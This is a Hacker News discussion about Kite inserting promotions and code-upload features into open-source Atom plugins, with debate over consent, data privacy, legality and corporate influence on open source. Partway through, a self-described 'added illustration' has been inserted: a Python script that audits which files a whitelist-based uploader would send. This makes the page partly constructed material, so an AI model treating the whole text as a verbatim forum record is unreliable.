Hacker News
How a VC-funded company is undermining the open-source community (theoutline.com)
1014 points by posnet on July 24, 2017 | 415 comments

Look at this clear dark pattern: https://outline-prod.imgix.net/20170721-QVaxMDgDwdZ1TBufCdq4.... (Image taken from the article.) Want to use our service? Then it only lists positives. Or these other services? Then it only lists negatives.

If you're reading this, Kite: I now have a negative view of your product. We cannot allow corporations to take over open source tools. Donating is perfectly fine and encouraged, but the above example is a downright takeover. If you want another tool then create one; don't take over an existing one and use the community's trust in that tool to promote your product.

I fell for this. I enabled it because I was curious about trying new development tools, only to find out later it uploaded all of the source code on my computer to their service. What the hell.

It took me months to get through to a human to get them to delete my code, including two emails to the CEO.

I like the idea, but there is no way I would use it after this experience.

WTF, this could get people fired. Many companies do not discriminate whether an employee has uploaded code to a third party server intentionally or not. If corporate software monitors catch this happening, it's a pink slip in many places. I just can't believe anyone would play with developers this way. What a cruel company.

> WTF, this could get people fired. Many companies do not discriminate whether an employee has uploaded code to a third party server intentionally or not.

That is why developers should be very careful what applications they install on the corporate computer and what cloud services they use.

It's true; "fool me once" and all that. But it really doesn't make the world a better place to live if it's easier to get fired by accident.

It could also get Kite sued.

Someone should definitely sue Kite.

Wait until they get their funding.

> it uploaded all of the source code on my computer to their service.

That sounds crazy, so I reviewed their privacy policy[0]. It looks like Kite now requires users to whitelist the directories it indexes and automatically purges files you remove from the local index.

The Privacy Policy says that:

> When you use our services, we may collect [...] Any source code files on your computer's hard drive that you have explicitly allowed our services to access. To learn how to control access to your source code files, please visit our FAQ.

The FAQ[1] says

> Kite only uploads files that:


> 1. Have a .py file extension,

> 2. Are children of a whitelisted directory,

> 3. And are not ignored by a .kiteignore file.

That doesn't seem like "any source code file on your computer" to me - unless it whitelists root by default, which would be a hella dark pattern.

Also, removing a file from the local index should remove it from the server as well [2]

[0] https://kite.com/privacy

[1] http://help.kite.com/category/30-security-privacy

[2] http://help.kite.com/article/10-how-do-i-delete-files-from-k...

It sounds like they changed something after I signed up. I am not super paranoid, but I am pretty savvy about privacy and keeping my data safe. There is no way in hell I would have agreed to upload all of my data to their service.

I was actually questioning myself when I realised what had happened -- I thought, "perhaps I just messed up". But after I saw this story about their other dark patterns, I'm convinced they just deceived me.

Their privacy policy as of 31 December 2016:


Seems similar enough to current version.

If you look at the screenshot posted by one of their founders it lists the user directory as the default whitelist: https://user-images.githubusercontent.com/87728/28395021-e04... and isn't clear on uploading everything from there

Hard to read that wording and not infer it was specifically phrased like that to prevent saying "we upload literally every file, recursively, in the below directory".

Easy to see very intelligent and circumspect people interpreting "where enabled" to mean "when I ask for autocomplete" and "your code" to mean "that specific snippet" because who the hell would actually think it's cool to just carte blanche upload other people's workspaces?
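An added illustration, not code from Kite or from any commenter in this thread, of the three selection rules quoted from the FAQ above (.py extension, under a whitelisted directory, not excluded by a .kiteignore) and of the "user directory as default whitelist" point: a small audit script that applies those rules to a constructed sample tree and lists what would be selected for upload. The .kiteignore format (one glob per line, # comments, matched gitignore-style relative to the directory holding the file) and the sample layout are assumptions; the real client's matching may differ. Running it with only the project directory whitelisted versus the whole home directory whitelisted shows how much a broad default whitelist widens the set.

```python
"""Audit which files a whitelist-plus-ignore uploader would select.

Added example for a defender checking exposure before enabling such a tool.
Rule set: .py extension, below a whitelisted directory, not matched by a
.kiteignore. The ignore-file format below is an ASSUMPTION (gitignore-like);
only the file name comes from the FAQ quoted in the thread.
"""
import fnmatch
import tempfile
from pathlib import Path

IGNORE_FILE = ".kiteignore"  # name from the FAQ; format assumed


def load_ignore_patterns(root):
    """Return (base_dir, glob) pairs from every .kiteignore under root.

    Assumption: one glob per line, '#' starts a comment, and a pattern applies
    to paths relative to the directory that holds the ignore file.
    """
    patterns = []
    for ignore_file in root.rglob(IGNORE_FILE):
        base = ignore_file.parent
        for line in ignore_file.read_text().splitlines():
            line = line.strip()
            if line and not line.startswith("#"):
                patterns.append((base, line))
    return patterns


def is_ignored(path, patterns):
    """True if any pattern matches the path (a path component or the whole relative path)."""
    for base, pattern in patterns:
        try:
            rel = path.relative_to(base)
        except ValueError:
            continue  # this ignore file does not govern that path
        if any(fnmatch.fnmatch(part, pattern) for part in rel.parts):
            return True
        if fnmatch.fnmatch(rel.as_posix(), pattern):
            return True
    return False


def files_that_would_upload(whitelist, extensions=(".py",)):
    """Apply the three rules to every whitelisted directory; return sorted Paths."""
    selected = set()
    for root in map(Path, whitelist):
        patterns = load_ignore_patterns(root)
        for path in root.rglob("*"):
            if not path.is_file() or path.suffix not in extensions:
                continue
            if is_ignored(path, patterns):
                continue
            selected.add(path)
    return sorted(selected)


def build_sample_tree():
    """Constructed sample 'home directory' (not real user data) in a temp dir."""
    home = Path(tempfile.mkdtemp(prefix="upload-audit-"))
    files = {
        "project/app/main.py": "print('hello')\n",
        "project/app/settings.py": "DB_PASSWORD = 'placeholder-secret'\n",
        "project/app/.kiteignore": "# keep credentials local\nsettings.py\n",
        "project/.kiteignore": "build\n",
        "project/build/gen.py": "# generated\n",
        "project/vendor/lib.py": "def helper():\n    pass\n",
        "project/notes.txt": "not python, never selected\n",
        "other/private.py": "API_KEY = 'placeholder'\n",
    }
    for rel, content in files.items():
        target = home / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return home


if __name__ == "__main__":
    home = build_sample_tree()
    for label, whitelist in (("project only", [home / "project"]),
                             ("whole home dir", [home])):
        print(f"whitelist = {label}:")
        for p in files_that_would_upload(whitelist):
            print("  ", p.relative_to(home).as_posix())
```

With the project directory whitelisted the script selects app/main.py and vendor/lib.py only (settings.py and build/ are excluded by the two ignore files, notes.txt by extension); with the home directory whitelisted, other/private.py is selected too even though it was never part of the project, which is the exposure the screenshot above raises.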

> Also, removing a file from the local index should remove it from the server as well [2]

Maybe you are thinking only for yourself. What about the majority of the users of minimap/(other hacked plugins) who don't know this is going on, and are not aware that some files need to be deleted from someone else's server?

PS: I know "hacked" is not the proper term here, but you get the idea.

I totally agree that putting proprietary integrations into open source packages is shady. However, I don't think that the Minimap "kite promotion" [0] went so far as to actually upload code to Kite's cloud platform. It looks like it just added tool tips that referenced Kite's documentation. That's distracting and unwanted, but not as egregious as uploading your code without permission.

[0] https://github.com/atom-minimap/minimap/commit/16c11d82b889c...

Not sure when you're seeing the privacy policy change was made but as an early user of the Kite desktop tool, directory whitelisting has been in place for a year or more.

If you want to see if they have any of your data, check: https://kite.com/settings/files

I have zero faith this page actually works though. A few months ago I deleted all of my data and I checked back today and it has reappeared. (I uninstalled the client and deleted my login token back then too, so as far as I can see it's their issue.)

I have sent them a stern email to delete my data. If you want your data deleted too, I would recommend doing the same rather than trusting their web interface. None of the emails on their website seem to work, though. Emailing the CEO does work eventually, but I don't want to start a witch hunt. My email is in my profile if you want his email.

WTF are those guys doing? Uploading source code without consent feels criminal; source code with app configs/secrets has ultra-sensitive information.

Does anybody have a list of infected packages so others can quickly remove them with `apm uninstall ...`?

Well technically you did consent by clicking "Enable Kite". I'm not familiar with Kite but the linked image has a line that says, "Click here to learn more.". I'd wager that it eventually links to a page that explains that all your source will be uploaded to their servers.

Now that doesn't make it any less shady though...

I don't really want to defend Kite, but when it says "Kite achieves this by analyzing your code in the cloud" I would assume that my code is uploaded to the cloud.

Which code is "my code" here?

My assumption from that dialog box would be that at most, the code I currently have open in my editor would be uploaded. Not all the source code on my computer.

How can autocomplete work without looking at all the other code too?

Edit to add: oh, wait, I misunderstood. It grabs all the code on your computer? That's crazy. I just meant it's not totally unreasonable to grab the whole git repo you're working in, say.

Yeah, screw kite.

Exactly. How do they know what is my code, or somebody else's? Dodgy.

If you're going to upload potentially private code from your user's computer to your servers, you better warn him with big fat red letters before you upload a single byte.

If you don't want to defend Kite, why bother defending Kite?

I'm not defending their actions. I'm just saying that I don't think they're as surprising as people make them out to be given the messaging in the product.

Hiding a detail like this into a "read more" is uber-shady. They deserve all the backlash they're getting.

Funny how I now read this as Uber-shady.

This is why some data protection and privacy laws are starting to require active, informed consent before taking some actions, instead of merely specifying "consent".

Even without that, basic contract law in many places requires a degree of mutual understanding for the contract to be valid in the first place. You can't just bury a surprising term with a huge effect deep inside a long legalese document and expect it to actually stand up in court, and if you're doing something dubious and relying on that as your defence then you might be in for some disappointment.

What they did is figuratively a felony (literally an "indictable offense") here in Canada. These guys are going to go to prison. Courts have ruled time and time again that hiding unreasonable or otherwise illegal actions in ToS does not absolve liability or criminality.

Just out of curiosity, what part of this is considered illegal? Not defending Kite here, but it seems that even though they are using some shady tactics to gain users, none of their product/ToS seems illegal.

Theft of copyrighted material, if bfirsh's claim of having the tool upload _all of the source code on his computer_ without asking about it.

Maybe even corporate espionage.

> Theft of copyrighted material

Copyright infringement is not theft. These are two completely different issues. When data is copied it is not taken away from the owner like when physical goods are stolen. Secondary damages may or may not occur, but they are not the same as depriving someone of a good. As an analogy, I wouldn't steal a car, but I surely would copy a car if I could do so by simply pressing a button...

This isn't necessarily only about copyright infringement (though it's definitely that too). If some of the source code on your machine contains sensitive information, like API keys, database passwords, etc.

Legally, the word "theft" isn't only used when one party loses anything; a victim of identity theft doesn't lose their identity, yet we don't call it "identity infringement". I'm not familiar enough with US law to know for sure, but it wouldn't surprise me if the word "theft" is used somewhere for obtaining sensitive information without permission.

Nuh huh

It's one thing to infringe on the copyright of a public work

Another, very different thing is to copy something that's not public and might be considered IP or a trade secret

Both are punishable crimes though, so I don't see what difference the point makes

The primary difference is that copyright infringement is a civil offense, not a criminal one, so nobody would be "going to prison".

That still leaves corporate espionage, which (last I checked) is a very severe offense. If that "source code" contained significantly-sensitive data (like medical info or info about legal cases), then there's a giant can of worms right there (and each of those worms has a surname of "Felony").

Copyright infringement is an act, and at least here in the US, an act for which both criminal and civil laws provide specific penalties/remedies. On the criminal side, obviously, one of the penalties is imprisonment.

Ah, I was unfamiliar with criminal penalties for copyright infringement. Could you go ahead and link me to the relevant US Code text that provides for such penalties?


This happens to be the one under which Kite would fall (since they're infringing copyright for "commercial advantage").

There is such a thing, in the US at least, as criminal copyright infringement.

No, but if that copyright material contained trade secrets then it is criminal.

And if it contained gold, it's actual theft.

But that's about as unlikely as the code containing trade secrets.


- For copyright infringement, they'd need to actually redistribute the code. Using it for machine learning and distributing short snippets wouldn't be copyright infringement.

- For that trade secret stuff you'd need to prove intent.

> For copyright infringement, they'd need to actually redistribute the code.

IANAL, but I don't think so. In MAI v. Peak[1], the court determined that even loading a program from disk to RAM was a copy, and therefore infringing without a license. Congress has since then added a specific exception for "Machine maintenance and repair", but that's it. Copying from a remote machine and storing it in their disks should certainly qualify.

[1] https://en.wikipedia.org/wiki/MAI_Systems_Corp._v._Peak_Comp....

> But that's about as unlikely as the code containing trade secrets.

Unpublished code is itself a trade secret. Even just the processes, procedures, organisation, tooling, library use, etc. in the code provide a competitive advantage, i.e. the 'metadata' is also a trade secret.

The only intent you'd need to prove is that the accused is using the trade secret to the 'economic benefit of anyone other than the owner'.

It seems obvious that Kite is training a proprietary ML algorithm, with trade secrets, for their own economic benefit.

Makes me imagine some angry and equally shady person might contribute to some open source projects that Kite uses internally. With a ToS addition giving them access to all available data on the company network if you are Kite.

Obviously this would be a terrible thing to do and no one should.

It does not just feel criminal, it probably is. On top of that it might make you liable for reproducing some company code without permission. Very very bad idea.

I've almost been bitten by them in the same way. I vaguely remember that it was through HN that I found out about Kite and installed their plugin(s). It definitely felt 'dirty'.

>only to find out later it uploaded all of the source code on my computer

It didn't ask? Sounds like malware, and meets the definition of theft. Inviting someone into your house does not give them permission to steal things in your home, and leave with them.

Kite has been mentioned a few times on HN, latest here: https://news.ycombinator.com/item?id=13977982

It clearly states in the diagram that the code you run Kite on will be analyzed in the cloud. If it truly uploaded "all of the source code on [your] computer" then obviously that is radically different but from my experience with the product, it did not upload my code besides what was directly related to what I was working on and understood would be analyzed in the cloud, just like Code Climate or any other code analysis service.

That could be enough to get you fired and/or sued depending on the status of the code on your computer.

That is theft of the highest order!!!

It's not theft, neither sorted nor random.

I would not forget to mention the owners of these projects who handed the projects over to Kite. I think they are in the wrong as much as Kite.

Iff they had foreknowledge that the changes were going to happen, which is unlikely. I'd be surprised if Kite bought/acquihired/etc. the product by disclosing a list of shady changes beforehand.

The minimap author, committing those changes after being hired by them, labelled them "Implement Kite Promotion".

The question remains, would he have accepted the purchase/job if he had known that Kite intended to do this? My point is that he probably didn't know until instructed to do so by his new bosses.

At which point he did it and is equally responsible as if he knew beforehand.

Beautiful use of "iff" in a sentence! ("iff" = "if and only if" for those wondering).

Contrarily, I would be surprised if the devs sold their code without asking, “why do you want it?”

Isn't that a bit too witch-huntery? It is Kite who is actively doing the shady stuff.

One of the owners was hired by Kite half a year ago.

This changes their power dynamic. One could argue they ought to find another job once the shady stuff started, but I still think you should focus on the actual instigators rather than the pawns.

In a security-sensitive corporate setting it is already harmful if anything gets uploaded to some cloud service - if this occurs, the damage already happens and anything that follows is "just" damage containment.

I believe about every company that develops software has some clauses about what software is allowed to be installed on the corporate computers and who has to initial any request to install a new program on the computer.

It's interesting watching HN get indignant when a company treats them the same way their idol companies treat everyone else. A lot of grab all data, track everything, and hide the creepiness in fine print type companies.

A system of permissions for plugins would be welcome in my mind for Atom, similar to browser plugins or mobile apps. Then a new "feature" would require the "transmit your code to a third party" permission.

How would you enforce that?

Please share the link for writing the negative review. It will make it easier for others as well to leave one.

> We cannot allow corporations to take over open source tools.

I don’t know how much I agree with that statement in general. There are several major open source projects with corporate “control” – Mozilla, Google and Apple control/heavily influence Firefox, Angular and Swift respectively and there are probably a dozen others. The idea that corporations are “bad” is a tired trope. Some corporations are bad, some are good, some are in the middle.

But I agree with your actual sentiment though – corporate involvement in open source should be as benevolent as possible.

"Some corporations are bad, some are good, some are in the middle."

I don't think we need to bring morality to the discussion and complicate the issue.

Corporations are organized around profit, open-source is not. With only that in mind you can predict what will happen in most of the cases.

To put Mozilla, a non-profit, in this context, in the same set as Google and Apple is not fair, by the way.

"Corporations are organized around profit, open-source is not. With only that in mind you can predict what will happen in most of the cases. "

All three of these statements seem like nonsense.

First, "Corporations are organized around profit". No, they are legal entities, organized around articles of incorporation. These have a purpose statement. Often, those purpose statements are directed toward lawful business goals. But you do not have to be.

Non-profit vs profit corporations can, quite literally, have the same set of purposes. The only difference between the two is what you can do with profits.

"open-source is not".

I'm not even sure what you are trying to say here. Very large amounts of popular open source, is, in fact, produced by for-profit companies, and has been since the beginning of open-source. The term was even created by a group of people at a for-profit company. So ....

"With only that in mind you can predict what will happen in most of the cases."

No, you can let whatever biases you seem to have stoke your imagination and prognosticate. You can't actually predict what will happen. There are plenty of happy, well functioning for-profit companies in open source that have been helping open source for many many many years. There are also plenty of non-profits that have harmed open source greatly.

It takes a lot of blindness to see this stuff as simply black and white.

So let's discuss your argument by taking Red Hat. For-profit, pure open source company. Founded 1993. Are we (I work at Red Hat) behaving badly?

I explicitly tried to leave "good" and "bad" out of the discussion, but OK, let's do that.

Red Hat's main worry is to be profitable. That is above any other concern.

You can be sure that, if their bottom line was threatened, they would be pushed, in order to survive, to change their business model, and they would not be beyond behaving in a "bad" (but legal) way if they didn't see another way around the problem.

In fact, we can argue that Red Hat management, it being a public company, is forced by law to do that.

I'm sure you're aware of the Solaris exodus that happened when Oracle decided to make OpenSolaris proprietary after acquiring it from Sun. The entire OpenSolaris engineering division quit in the span of a month. Do you think the same wouldn't happen if RedHat decided to start doing horrible things to their customers or the community?

You're acting as though nobody who works at Red Hat cares about the community which they worked with before they had a job at Red Hat. I work at SUSE, and I work primarily as a member of a community. If SUSE started mistreating their customers or the wider community I would quit.

I hope that if you found that your company was mistreating the wider community you would also quit.


My point is not that "all companies are good". I'm saying that making a judgement that "all companies will harm free software at the end of the day" ignores the fact that companies still need humans to work for them that do said contributions. Personally I find that many people who work in free software have quite strong ethics when it comes to things like this, but that's just my anecdote.

I see this touch you personally, so I want to apologize if I bothered you.

I have no idea how Red Hat or SUSE would act, maybe they would be an exception, and, maybe, very ethical workers could keep some companies in check.

On the other hand, I don't think that the idea that companies, in order to survive, will try anything (legal) should be so polemic.

My (somewhat strong, sorry about that) response was mainly a reaction to the larger trend I've seen in the free software community as of late -- that companies that work on free software are somehow a net negative.

I don't know where this view comes from, it was Stallman's goal from day one that it should be possible to have companies built around free software. The fact that my first job out of high school was working at a free software company should be celebrated as a huge accomplishment by the wider community. But it's not seen that way. I find it quite disheartening, because I've always been an advocate for free software and my job title doesn't suddenly change that.

I realise that you're not saying that (and so I'm sorry for the strong response), and of course we must question the motives of companies. But it's become a popular game these days to pretend as though everything that a free software developer does as part of a job must be part of a conspiracy to create a monopoly -- it's ludicrous and is quite grating.

History has proven time and again that it's generally a very bad idea to be dependent on others' good will, which is by nature self-interested and ephemeral.

I think people are interested in their basics, income, job, family before any other priorities.

Some people in fact become so paranoid about this that they may overlook or even support unethical action as long as they are safe.

Surveillance, profiling and dark patterns by leading SV companies including Google, Facebook, Palantir etc., composed of tens of thousands of engineers who may at one time have loudly proclaimed contrary values, is just one example of this.

But how, in the end, did that affect Oracle? Did their stock price drop? Were they unable to sell things? Or did business kinda go on as usual?

The comparison isn't as appropriate, as Oracle is a much bigger company, and is able to handle the loss of that many people in a better way. But the gist is similar.

Oracle Solaris is on life support because they don't have any of the old engineers. They have not worked on ZFS or DTrace since then (and the illumos community has massively improved those projects in the meantime). Recent news makes it look like Oracle Solaris may be killed quite soon.

That was the result, they tried to mistreat the OpenSolaris community and then Oracle no longer was competitive in the Solaris space.

If you want to learn more, check out bcantrill's talk. https://m.youtube.com/watch?v=-zRN7XLCRhc

> In fact, we can argue that Red Hat management, it being a public company, is forced by law to do that.

You could argue that, but you would almost certainly be wrong. It is a myth that management at a company is always required to seek profit above everything else. Indeed, many companies explicitly do not do this, for example by having policies about operating in an environmentally friendly way for ethical reasons.

Companies have policies until they stop having them.

I'm not saying that companies have to seek profit above everything; I am saying that it's their main concern, otherwise they will not survive.

Indeed, management will have space to be nice when things go well, but they will automatically receive pressure from investors to change their nice ways when things go bad.

This is the way that it's intended to work and there is, I think, nothing surprising there.

Even if it were as simple as that, it wouldn't be as simple as that!

There's a difference between short-term and long-term profitability. Being 'nice' might limit profits in the short term but might be crucial for long-term survival.

And, nobody knows for sure what the correct long-term strategy is. Not every step that yields an immediate profit is a step in the right direction.

did you support and push systemd?

Corporations are just legal structures.

For instance, you call Mozilla a non-profit. But it is a non-profit corporation, a legal entity that has organized itself in a certain way and applied for special tax treatment.

For-profit or non-profit makes a huge difference, in my opinion.

The goals and the incentives are very different.

Isn't Mozilla organized as a for-profit that owns a non-profit? Actually, if you look at US tax law there are reasons that some non-profits have for-profit parts. I know Mayo was organized that way. I think it had to do with some salary requirements, but it's been twenty years, so I'm a bit fuzzy.

There is a non-profit (The Mozilla Foundation, affectionately referred to as "mofo") which owns a for-profit (The Mozilla Corporation, known as "moco") as a wholly-owned subsidiary.

The corporation is governed by the same rules as the foundation, compare https://www.mozilla.org/en-US/foundation/

> Our work is guided by the Mozilla Manifesto.

to https://www.mozilla.org/en-US/foundation/moco/

> The Mozilla Corporation is guided by the principles of the Mozilla Manifesto.

(I'm an employee of moco, I've always felt like I'm working at a values-based rather than a profit-based organization, personally.)

I guess my point is that the profit status might not be the most important thing to determine what values your organization has.

The Mozilla non profit is the owner of a for profit company that carries out much of their activity. Which you probably meant, but you've typed it the other way around.

Yeah, I meant in the same way as Mayo (NP -> FP). Not enough coffee, thanks.

Sure, as stated in the articles of incorporation. Many states offer an in-between type of corporation called a benefit corporation. It is for-profit, but the articles of incorporation require it behave, additionally, with social benefit in mind. And they are obligated by their charter, and can be dissolved by the state responsible for the entity's creation, if they don't follow it. The public would have some degree of standing that wouldn't necessarily apply to other corporations.

Technically, non-profit only means that the corporation is not allowed to directly redistribute profit to its shareholders. This reduces the amount of pressure from shareholders to generate large profits, but still even a non-profit corporation has to pay its expenditures somehow and not lose money doing so.

> This reduces the amount of pressure from shareholders to generate large profits

Just to clarify, since this sentence was ambiguous: not-for-profit companies do not have shareholders or owners. So the fact that there is no "pressure from shareholders" is vacuously true, because there are no shareholders.

Not-for-profits typically have donors and boards of directors, who both apply pressure to see the corporation's funds used to realize its mission.

When I wrote that sentence I thought about changing "shareholders" to "members" or "stakeholders", but then I left it as it was because it seemed to more clearly represent the contrast with, or absence thereof in, a for-profit corporation.

I'm a board member of a smallish Czech non-profit and one of the things I've found out is that the legal requirements on the corporate governance structure are mostly equivalent to what is required for a publicly tradeable corporation that is actually not publicly traded, thus for me it makes some sense to equate voting members to shareholders.

> With only that in mind you can predict what will happen in most of the cases.

With just this information and no other, I think I'd predict corporations to make better software than open source. I take it that's not what you had in mind.

(This is for similar reasons that I expect for-profit companies to provide better service than government-run ones. I don't particularly want to get into a debate right now about whether that actually happens, just trying to explain my intuitions.)

I'd agree with this. We can all agree Windows is infinitely better than Linux because people pay for it.

Also Internet Explorer is infinitely better than Chrome and Firefox.

For a non-technical user Windows is the infinitely better product than typical Linux desktops, you should see the pain that people go through that use commercial software nominally supported on Linux such as Cadence tools compared to the same experience on Windows, not to mention the lack of any serious well made office suite.

Heck, in direct comparison Ubuntu 16.04 looks like a joke system compared to Windows 10. For example, Ubuntu doesn't let me use my on-board sound and only displays the dedicated sound card, but only half of the time. It has a horrible toy-like ripped-off user interface with ugly buttons, and I can't think of a single application that is actually better than an equivalent application that is also available on Windows. The only reason I'm using Linux is because in a lot of areas, including the field I work in, it has achieved the same lock-in that Windows has for the general desktop market.

It is kind of sad that the only two alternatives are a clone of 70s technology or a clone of 80s technology. I feel like there should be a way to get things unstuck, but research into operating system design has all but ceased, with very few exceptions, many of them ironically coming from Microsoft.

Ubuntu is backed by Canonical Ltd. so it's corp vs. a much bigger corp. Linux as server vs Windows Server might be a more appropriate comparison for this.

It's so frustrating that the data derived from this reality never agrees with these simple economic theories I derived from first principles and my econ 101 class that are so obviously correct.

I blame the so-called "experts" and their propaganda about "complexity" and "human behaviour" for distorting the efficient market. In the cases of historical data it seems they have even retroactively distorted the markets.

I didn't say corporations make better software than open source. I said that if I had only a single piece of information that's the prediction I'd make.

I have opinions about to what extent my counterfactual prediction is correct; and to what extent it's not; and why it fails, in the cases that it fails. I left them out because they weren't relevant. If you wanted to talk about them, that's a thing I might be willing to do. But I'm not interested in being snarkily accused of mistakes I didn't make.

I have no idea who makes better software.

What I mean is this: if you mix open-source with a for-profit entity, don't be surprised when that entity tries to extract profits even in ways orthogonal to the original intention of the project.

Of course, in practice, and by the nature of open-source, this is very difficult to do and, normally, can be prevented, but the trend is there and should be taken into account.

Mozilla made Firefox. Google made Angular. Apple made Swift. That's not "taking over". While I am not a fan of this phenomenon either, that has nothing to do with the current situation. They simply built something and open sourced it; nothing was "taken over".

I'm going to take a contrarian stance on this one: I believe there is no story here — adding an ad for an opt-in cloud-based tool to dev tools is not spyware. It's opt-in! It's clearly stated. Would people raise a fuss to find out their CI service like CircleCI or linter service like Code Climate had access to their code (it's sufficiently obvious)? I don't really see why this tool is any different other than they are one of the first to make a code analysis service that runs in realtime.

I beta tested the Kite product when it first launched maybe two years ago. I don't use it today but I would try it again. Since then they've only tightened down on permissions and made things clearer.

Kite was also not the first to run ads in an IDE plugin (Wes Bos has sponsored several), at least not in Sublime. Personally it's not my preference to have ads either but ultimately this is up to the maintainer of each repo. The tool is still free to use. It clearly states that using the cloud engine will upload your code to do analysis in the cloud. It's 2-3 sentences, not like it's buried in some long EULA.

Shame on the article for labeling inserting an ad as "taking over" and labeling an ad as "spyware"… pure clickbait targeting non-devs.

The new Kite engine also clearly states it is a cloud-based service and they build integrations for their service. The whole industry works the same way. You don't have to use their engine to use autocomplete-python and it's opt-in too.

It is opt out. You can read the comments from the Kite developer yourself.
Your comments are such a poor defense of a dubious feature I wonder if you have a connection to Kite.

It appears you have misunderstood my argument. The atom-minimap extension you linked is not the autocomplete-python extension discussed in the parent thread. I have not used the atom-minimap extension and didn't make any comments on it — I use Sublime. My comments are about the autocomplete-python extension.

I think you're overlooking the diagram linked above which shows enabling the Kite engine is an opt-in button click. The CEO also states that it is opt-in in the article: "Most users who install autocomplete-python close the engine selection prompt, which results in not getting Kite or its benefits," [the CEO] said in an email.
As I stated above, I beta tested the Kite product early on and have used it in Sublime through a similar add-on. I am not a current customer / user, but I do make my own dev tools. It was always completely transparent to me that they are sending code to their server to run a cloud analysis platform. Based on that, I still maintain that the community is massively overreacting to something that was made explicit upfront.

Well, who benefits from having the ads there? Wouldn't it be better for most users without the ads? What value is Kite adding?

It's a slippery slope, similar to the controversies over using BitKeeper for the Linux kernel or adding DRM to HTML5 (both justified, I think). The openness in open source needs to be defended.

While I would not argue anything about ads directly, I think that all users benefit from having additional options in the plugin, and if the ad is relevant to a portion of users and leads to some users discovering an additional dev tool for their workflow, then it was worthwhile. That is the perspective I have in mind for the hypothesis that Kite was testing.

I genuinely don't understand why this service is getting a disproportionate amount of backlash relative to the plethora of cloud based services out there that analyze one's entire codebase. Maybe it's because they're interacting with the code from the dev machine directly vs integrating with repos on the git server? Would that make it different to you?

The massive difference is that Kite is using manipulative, dishonest tactics.

When I sign up for a service like Code Climate it's very clear that I am giving them access to some of my code. I also have easy control over what code they can see. They are honest and upfront about what they are doing and why.

Kite has been trying to hide what they are doing, with the goal of tricking developers into doing things they otherwise wouldn't. They're taking advantage of the huge amount of trust in the open source community. Kite must know that abusing this trust has a high chance of hurting the community, but they don't seem to care, as long as they can make a quick buck or two for themselves.

A lot of people here really cherish that trust and goodwill among strangers in the open source world, and are understandably pretty pissed when someone comes along and messes with it.

The bottom line though is being honest and upfront with developers. I suspect Kite could have been a bit more forward about what they were doing and the developer community would have reacted with much less outrage.

Where I work, the VPE signed up for Code Climate. Code Climate also gets our code by asking for git creds, making it very clear what they're doing.

Installing Kite and accidentally allowing them to sucker me into uploading the entire corporate source tree -- quite possibly with creds -- is literally a walk you out fuckup. At bare minimum I would have to page ops and roll creds on every bit of prod. Want to know why there's both a gitignore and a git commit hook making sure 'config/creds.py' is not uploaded anywhere?

There's virtually no ethical way to build that dialog unless you put 40 point red font saying "We upload your entire source tree" and make you wait 10 minutes before continuing. This is not a decision line level devs are allowed to make on their own, and Kite tricks them into doing exactly that.

Hi Ruben, founder of Kite here. I think this issue deserves a more thorough response because there are a lot of misrepresentations in the article.

One misrepresentation that I wanted to quickly highlight is that the autocomplete-python install flow has three steps, not just the one linked to in the screenshot above. The other two are:

Enter their email address - https://user-images.githubusercontent.com/87728/28395016-dc7...

Read a warning, decide if they want to whitelist any files - https://user-images.githubusercontent.com/87728/28395021-e04...

Small technicality: these screenshots say that Kite is installing but it's actually only downloading the installer binary to memory; the actual install doesn't happen unless the user goes through all three steps.

It's also worth noting that if the user clicks "Add Later" no code is sent to the Kite servers for analysis until they whitelist a directory.

You are trying to blame the user, but the design of this flow is to blame. It does not explain clearly what is going on.

It's funny seeing this now to see where I tripped up. When you say "enable access in /Users/ben", I guess 6-months-ago-me assumed it meant "enable access to code in /Users/ben when I am working on it". It felt a bit like an iOS permissions dialog, where I was giving you access to my filesystem. Parsing it now, I realise that the text above the button says "where enabled, your code is sent to our cloud".

You could argue I should have read that more carefully, but that copy doesn't scream to me "I'm about to upload all of the source code on your computer including proprietary stuff and secrets". Because that button was the default highlighted button, I assumed it wasn't going to do anything drastic like that. (It's like Ryanair having a big red "YES I WOULD LIKE INSURANCE" button, hiding the "no I don't want to spend $100" button somewhere in the small print.)

Above all, you certainly shouldn't have included that as a shady update to some Atom extension I was using.

> I think this issue deserves a more thorough response because there are a lot of misrepresentations in the article.

From the article:

> Smith also said that most of the negative reaction was due to confusion around what the tools actually do. (Connor pointed out that it’s not possible to review what Kite does, since it itself is not open source.) Then he blew this reporter off. “I apologize in advance that I can't answer any further questions,” he wrote. “I need to focus on other parts of the business, including continuing to improve the product for our users, and conflict like this is always doubly distracting.”

The above sounds like you were given the opportunity to explain things but shrugged it off as a distraction.

If it deserves a more thorough response, why hasn't that been given? Even in this reply you only "quickly highlight" one point.

Yeah, I came here to say exactly this.

Even with the additional steps and even with explicit whitelisting of directories (from screenshots it looks like it defaults to the user directory, which is just bad) before code's uploaded, the point is that Kite took over a useful, popular open source package, clearly hitching on to the popularity of the package to promote Kite, which is distasteful when it comes to OSS.

Why not fork the original autocomplete-python with one that has Kite enabled instead? Then users who want Kite or use Kite are able to do so, without screwing over everyone else who has no idea what Kite is and doesn't want anything to do with it.

Reminds me of software downloaded in the past that comes with some random search toolbar that gets installed in browsers. Annoying. Shady. Not cool.

This. That would have been the correct solution. Fork the code and offer their "Kite enabled" version separately. If Kite has to resort to these types of tactics to push their product it seriously makes me doubt its efficacy. If they can't market their product based on its merits, why would I want to use it?

The post you are responding to is by Adam, adamsmith, the CEO of Kite. We are different people and I have no relation to him at all. Just to be clear.

Edit: disregard this comment...

According to your and his comments on this page you two co-founded Kite, how is that "no relation at all?"

Read again. adamsmith said "Hi Ruben" to start his post and then said that he (adam) is a founder.

Whoops, my mistake. Edited original comment.

This situation seems to have the best and worst of open-source. Best, in that the license of the projects allowed them to be forked without too much effort. Worst, in that it shows how easy it is for a project to be subverted once the maintainers are bought (in this case, given a job). It also remains to be seen if the average Atom user will see the difference between the Kite-branded (and, currently, more popular) and the forked versions of these plugins.

Besides the open source issues, this tactic seems to reveal a massive desperation by the Kite folks. There is no way they couldn't have seen how negative this was going to look once people found out. Their ability to attract new users through word-of-mouth and organic advertising must have plateaued. Sneaking their service into a well-used plugin would have given them a boost in users, maybe enough to attract a new round of funding, but they must have known it would cause this kind of bad blood. Especially based on their past reception on HN, which was highly upvoted but in which they never convincingly answered the concerns about uploading users' source code to the cloud:
> this tactic seems to reveal a massive desperation by the Kite folks

That's the weirdest part to me. Who, exactly, thought this was going to go well? It is hard to be sneaky with open source. And even harder to win back goodwill after being caught out.

